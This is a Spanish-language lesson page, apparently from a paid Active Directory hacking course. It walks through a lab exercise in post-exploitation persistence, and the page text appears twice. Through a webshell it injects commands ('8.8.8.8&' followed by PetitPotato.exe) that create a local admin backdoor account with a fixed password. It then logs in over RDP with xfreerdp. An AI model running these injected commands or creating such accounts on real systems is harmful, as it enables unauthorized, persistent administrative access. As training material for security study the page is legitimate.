Hacking en Active Directory - [CPAD-100]

Creacion de usuarios con net

AnteriorIntroduccion a la post-explotación y persistencia en Windows SiguienteQué es Mimikatz

Última actualización hace 1 año

¿Te fue útil?

Creacion de usuarios con net

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

OBJETIVO DEL EJERCICIO #5:

Crear un usuario local y agregarlo en el grupo de administratores locales con net.Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.

Teniendo en cuenta que tenemos una webshell y podemos ejecutar comandos como NT Authority System, vamos a crear un usuario local y lo añadimos al grupo de administradores locales:

El comando net en sistemas Windows es una herramienta versátil que proporciona capacidades para gestionar usuarios, grupos y recursos compartidos, entre otros. Un atacante puede utilizar el comando net para crear usuarios por varias razones:

Persistencia: Crear un nuevo usuario le permite al atacante tener una forma de acceder al sistema incluso si su acceso inicial se ve comprometido o revocado. Al establecer una cuenta adicional, el atacante puede regresar al sistema utilizando estas credenciales.
Elevación de privilegios: Si un atacante ha ganado acceso a una máquina con privilegios elevados (por ejemplo, como administrador), puede crear un usuario y asignarle derechos administrativos, lo que le permite realizar tareas con privilegios elevados en el futuro.
Movimiento lateral: Una vez que se ha creado una cuenta en una máquina, el atacante puede intentar utilizarla para acceder a otras máquinas dentro de la misma red, especialmente si se utilizan políticas de contraseñas débiles o si hay una falta de segregación de red adecuada.
Acceso a recursos: Al crear un nuevo usuario, el atacante puede otorgar a esa cuenta específicos permisos o accesos a recursos, como archivos o directorios, que de otro modo estarían restringidos.
Ocultar actividad: En lugar de comprometer y usar una cuenta existente, crear una nueva puede ayudar al atacante a evitar ser detectado. Las acciones realizadas por una cuenta de usuario recién creada pueden no generar el mismo nivel de sospecha inmediata que las acciones realizadas por una cuenta existente que de repente muestra un comportamiento atípico.
Facilitar actividades adicionales: Al tener una cuenta bajo su control, un atacante puede configurar servicios, tareas programadas o aplicaciones para que se ejecuten bajo el contexto de ese usuario, asegurando que estas actividades tengan los permisos necesarios para operar.

Vamos a ejecutar los siguientes comandos desde nuestra webshell:

8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net user gerh P4ssw0rd /add"

La pagina retornara lo siguiente:

Ahora vamos a darle super poderes a este usuario:

8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net localgroup Administrators gerh /add"

Y luego saldra lo siguiente:

Nosotros podemos validar, si lo anterior fue exitoso por medio del siguiente comando:

8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net user gerh"

Y despues de lo anterior, vamos a intentar conectarnos por RDP ya que este puerto fue localizado al inicio de la auditoria Enumeracion sobre un servidor web desplegado en IIS

Y proporcionamos las credenciales:

Y despues obtendremos una sesion de RDP:

Tambien podriamos obtenerla por medio de Kali Linux asi:

xfreerdp /u:"gerh" /p:"P4ssw0rd" /v:3.133.16.165 -wallpaper +clipboard /dynamic-resolution +window-drag

Luego de presionar Y:

AnteriorIntroduccion a la post-explotación y persistencia en Windows SiguienteQué es Mimikatz

Última actualización hace 1 año

¿Te fue útil?

OBJETIVO DEL EJERCICIO #5:

Crear un usuario local y agregarlo en el grupo de administratores locales con net.Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.

Teniendo en cuenta que tenemos una webshell y podemos ejecutar comandos como NT Authority System, vamos a crear un usuario local y lo añadimos al grupo de administradores locales:

Persistencia: Crear un nuevo usuario le permite al atacante tener una forma de acceder al sistema incluso si su acceso inicial se ve comprometido o revocado. Al establecer una cuenta adicional, el atacante puede regresar al sistema utilizando estas credenciales.
Elevación de privilegios: Si un atacante ha ganado acceso a una máquina con privilegios elevados (por ejemplo, como administrador), puede crear un usuario y asignarle derechos administrativos, lo que le permite realizar tareas con privilegios elevados en el futuro.
Movimiento lateral: Una vez que se ha creado una cuenta en una máquina, el atacante puede intentar utilizarla para acceder a otras máquinas dentro de la misma red, especialmente si se utilizan políticas de contraseñas débiles o si hay una falta de segregación de red adecuada.
Acceso a recursos: Al crear un nuevo usuario, el atacante puede otorgar a esa cuenta específicos permisos o accesos a recursos, como archivos o directorios, que de otro modo estarían restringidos.
Ocultar actividad: En lugar de comprometer y usar una cuenta existente, crear una nueva puede ayudar al atacante a evitar ser detectado. Las acciones realizadas por una cuenta de usuario recién creada pueden no generar el mismo nivel de sospecha inmediata que las acciones realizadas por una cuenta existente que de repente muestra un comportamiento atípico.
Facilitar actividades adicionales: Al tener una cuenta bajo su control, un atacante puede configurar servicios, tareas programadas o aplicaciones para que se ejecuten bajo el contexto de ese usuario, asegurando que estas actividades tengan los permisos necesarios para operar.

Vamos a ejecutar los siguientes comandos desde nuestra webshell:

8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net user gerh P4ssw0rd /add"

La pagina retornara lo siguiente:

Ahora vamos a darle super poderes a este usuario:

8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net localgroup Administrators gerh /add"

Y luego saldra lo siguiente:

Nosotros podemos validar, si lo anterior fue exitoso por medio del siguiente comando:

8.8.8.8& C:\Users\Public\PetitPotato.exe 3 "net user gerh"

Y despues de lo anterior, vamos a intentar conectarnos por RDP ya que este puerto fue localizado al inicio de la auditoria Enumeracion sobre un servidor web desplegado en IIS

Y proporcionamos las credenciales:

Y despues obtendremos una sesion de RDP:

Tambien podriamos obtenerla por medio de Kali Linux asi:

xfreerdp /u:"gerh" /p:"P4ssw0rd" /v:3.133.16.165 -wallpaper +clipboard /dynamic-resolution +window-drag

Luego de presionar Y: